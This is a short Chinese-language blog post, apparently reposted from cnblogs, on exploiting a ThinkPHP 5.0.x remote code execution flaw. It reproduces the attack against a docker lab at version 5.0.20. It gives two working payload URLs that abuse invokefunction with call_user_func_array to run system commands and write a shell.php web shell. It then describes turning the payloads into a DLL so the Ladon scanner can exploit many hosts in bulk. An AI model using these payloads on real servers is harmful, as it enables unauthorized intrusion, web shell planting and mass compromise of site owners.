前言
使用Exp生成器生成Ladon插件实战,ThinkPHP GetShell
漏洞环境
使用docker ThinkPHP 5.0.20
复现测试
Payload:
执行命令
写入文件
GetShell1
http://192.168.1.37:8080/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo 111111>shell.php
GetShell2
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=URL编码内容
视频教程
通过EXP生成器将以上Payload转成DLL,使用Ladon即可批量利用,详情请观看视频教程
Video: K8Cscan ThinkPHP 5.x RCE Exploit
原文地址:https://www.cnblogs.com/k8gege/p/12307453.html
时间: 2024-11-09 09:24:59